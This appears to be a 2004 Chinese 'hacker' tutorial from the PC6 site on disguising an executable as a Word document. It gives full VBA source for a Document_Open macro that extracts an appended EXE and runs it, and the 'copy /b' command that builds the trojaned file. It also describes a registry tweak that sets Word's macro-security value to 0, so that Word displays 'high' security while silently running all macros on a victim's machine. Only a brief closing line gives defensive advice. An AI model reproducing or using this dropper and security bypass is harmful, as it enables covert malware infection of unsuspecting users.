文章导航PC6首页软件下载单机游戏安卓资源苹果资源

热门搜索：小米4iOS8完美越狱iPhone 6

资讯首页软件教程安卓教程苹果教程游戏攻略网游攻略手游攻略

您的位置：首页 → 网络冲浪 → 黑客天空 → EXE变DOC的方法

EXE变DOC的方法

时间：2004/10/8 16:39:00来源：本站整理作者：蓝点我要评论(0)

　　　　

EXE变DOC的方法

其实这种转换并不是文件格式上的变化,只不过是把一个exe文件接在一个doc文件的末尾而已,这个doc 文件当然就不是不同word的文档啦,该文档中包含了宏语句,能在 运行的时候把接在自己文件末尾的exe文件数据读取出来并运行,就 造成一种假象,好象文档打开时就运行了exe文件似的.(和文件捆绑器的原理很象啊!)  熟悉vb的朋友都知道,word的宏是使用vba来编写的,具体语法和vb一样,但有些方法vb中没有,如宏病毒 就是利用宏复制语句来达到感染的目的.和vb一样,我们可以在编写宏的时候调用windows api!!下面我们来介绍一下我们编写这个宏需要用到的api函数:  1)createfile 用于打开文件,该函数vb的声明如下:  declare function createfile lib "kernel32" alias "createfilea" (byval lpfilename as string, byval dwdesiredaccess as long, byval dwsharemode as long, byval lpsecurityattributes as long, byval dwcreationdistribution as long, byval dwflagsandattributes as long, byval htemplate as long) as long 2)closehandle 用于关闭被打开文件的句柄,该函数vb的声明如下: declare function closehandle lib "kernel32" (byval hobject as long) as long 3)readfile 用于从被打开文件中读取数据,该函数vb的声明如下: declare function readfile lib "kernel32" (byval hfile as long, lpbuffer as byte, byval dwnumberofbytestoread as long, lpnumberofbytesread as long, byval lpoverlapped as long) as long 4)writefile 用于把读取出的数据写入文件,该函数vb的声明如下: declare function writefile lib "kernel32" (byval hfile as long, lpbuffer as byte, byval dwnumberofbytestowrite as long, lpnumberofbyteswritten as long, byval lpoverlapped as long) as long 5)setfileponiter移动文件指针,该函数vb的声明如下: declare function setfilepointer lib "kernel32" (byval hfile as long, byval ldistancetomove as long, byval lpdistancetomovehigh as long, byval dwmovemethod as long) as long 6)下面是以上函数的参数声明 public const generic_read as long = &h80000000 public const generic_write as long = &h40000000 public const file_share_read as long = 1 public const file_share_write as long = 2 public const create_new as long = 1 public const create_always as long = 2 public const open_existing as long = 3 public const open_always as long = 4 public const truncate_existing as long = 5 public const invalid_handle_value as long = -1 public const file_attribute_normal as long = &h80 好了,有了这些准备工作就可以开始了,我们运行word2000,打开visual basic编辑器,新建一个模块,把上面的函数 和参数声明拷进去!再回到“thisdocument”的代码视图，选择document open的事件，输入一下代码： private sub document_open() dim buffer(65536) as byte dim h, h2, j, i, k as long h = createfile(thisdocument.path & "/" & thisdocument.name, generic_read, file_share_read + file_share_write, 0, open_existing, 0, 0) ‘以share_read的方式打开自身的doc文件 h2 = createfile("c:\autoexec.exe", generic_write, 0, 0, create_always, 0, 0) ‘新建一个exe文件准备存放读取出来的数据. if h = invalid_handle_value then exit sub end if k = setfilepointer(h, 32768, nil, 0) ‘把文件指针移动到doc文件与exe文件交界处. do i = readfile(h, buffer(0), 65536, j, 0) i = writefile(h2, buffer(0), j, j, 0) loop until j < 65536 closehandle (h) closehandle (h2) shell "c:\autoexec.exe" ‘运行exe文件 end sub   这样宏就编写好了,注意的地方就是上面setfilepointer函数的使用部分:32768是你编写完宏保存 好的doc文件的文件大小,不一顶就是32768哦,大家注意!  大家可能有疑问,如何把exe文件接到doc文件后面呢?很简单,把你要接的exe放到和 这个doc文件同一个目录下.运行doc命令:  copy /b xxxx.doc + xxxxx.exe newdoc.doc  这样就可以了~~~.当你打开这个newdoc.doc的时候,宏就会把后面的exe文件读出来并保存 在c:\autoexec.exe中,然后运行,是不是很恐怖啊!不过这需要你的word2000安全度为最低的时候 才能实现,关于这个安全度的问题,我们又发现了微软的小bug,大家看看注册表中这个键:  hkey_current_user\software\microsoft\office\9.0\word\security 中的  level值.当安全度是3(高)的时候,word不会运行任何的宏,2(中)的时候word会询问你是否运行宏,1(低)的时候 word就会自动运行所有的宏!但很容易就被发现安全度被设为低了,聪明的你一定想到如果这个值 变为0的时候会怎么样!!??对了!如果设为0的话,word里面就会显示安全度为高,但却能自动运行任何 的宏!!是不是很夸张??和注册表编辑器的后门一样这都是ms的后门吧?  如果要受害人的机器接受你的doc文件又能顺利运行,最重要就是把word的安全度在注册表中的 值改为0,怎么改??方法太多了吧,单是ie的恶意代码能实现的都太多了,另外,如果网页上连接上是doc的 话,ie也会自动下载该doc文件!危险的ms啊!!  这个算不算漏洞我不敢说,但防范真的很难,除非一天到晚监视着注册表,或者不用word?太消极了 吧,最重要的是小心防范,陌生人的东西千万不要收!包括非exe文件,我们现在发现了doc文件能 隐藏exe文件，也会有人发现其他文件能隐藏exe,所以大家千万要小心.

相关视频

• windows10自带扫雷游戏在哪
• windows11专业版和家庭版的区别
• windows11家庭版和专业版有什么区别
• windows11我的电脑在哪里打开
• windows11我的电脑在哪
• win11系统怎么退出微软账号
• win10ie打开变成edge
• win11怎么设置默认浏览器
• win11 ie浏览器在哪里
• windows11怎么连接wifi
• windows11有必要升级吗
• windows11怎么把我的电脑放在桌面上
• win10怎么隐藏任务栏
• win10任务栏颜色怎么改
• win10已禁用输入法怎么解决

相关阅读 Windows错误代码大全 Windows错误代码查询激活windows有什么用Mac QQ和Windows QQ聊天记录怎么合并 Mac QQ和Windows QQ聊天记录Windows 10自动更新怎么关闭 如何关闭Windows 10自动更新windows 10 rs4快速预览版17017下载错误问题Win10秋季创意者更新16291更新了什么 win10 16291更新内容windows10秋季创意者更新时间 windows10秋季创意者更新内容kb3150513补丁更新了什么 Windows 10补丁kb3150513是什么

文章评论

查看所有0条评论>>

发表评论

我来说两句...

提交评论

热门文章 黑客大战直播网址 黑客

最新文章 黑客大战直播网址 黑客什么是木马,什么是木马 计算机病毒是指什么什么是木马,什么是木马病毒黑客破解密码常用的方法告诉你黑客的Google搜索技巧

人气排行 如何攻击局域网电脑无线网络密码破解教程（破解无线路由WEP加密网站获得系统权限攻击教程流光破解ftp密码教程计算机病毒是指什么黑客破解密码常用的方法如何命令行/DOS下列出进程名与进程文件路径2010黑客工具

• 关于本站|下载帮助|下载声明|软件发布|联系我们|友情链接|意见反馈
• PC6开启用户体验优化计划，如您有好的建议请联络我们！  备案编号:琼ICP备2022005661号-1